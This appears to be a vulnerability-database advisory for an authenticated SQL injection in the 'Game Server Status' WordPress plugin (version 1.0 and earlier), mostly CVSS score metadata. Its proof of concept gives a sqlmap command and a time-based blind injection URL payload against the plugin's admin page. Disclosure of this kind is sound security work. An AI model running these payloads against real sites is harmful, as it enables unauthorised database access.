Lucene search

NeppahWPEX-ID:8A74A2A0-3D8C-427F-9A83-0160D652C5F0

HistorySep 21, 2021 - 12:00 a.m.

Game Server Status <= 1.0 - Admin+ SQL Injection

2021-09-2100:00:00

Neppah

259

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON

The plugin does not validate or escape the server_id parameter before using it in SQL statement, leading to an Authenticated SQL Injection in an admin page

sqlmap -u "https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1" -p server_id --dbms mysql --cookie [your cookie]

https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON

Related for WPEX-ID:8A74A2A0-3D8C-427F-9A83-0160D652C5F0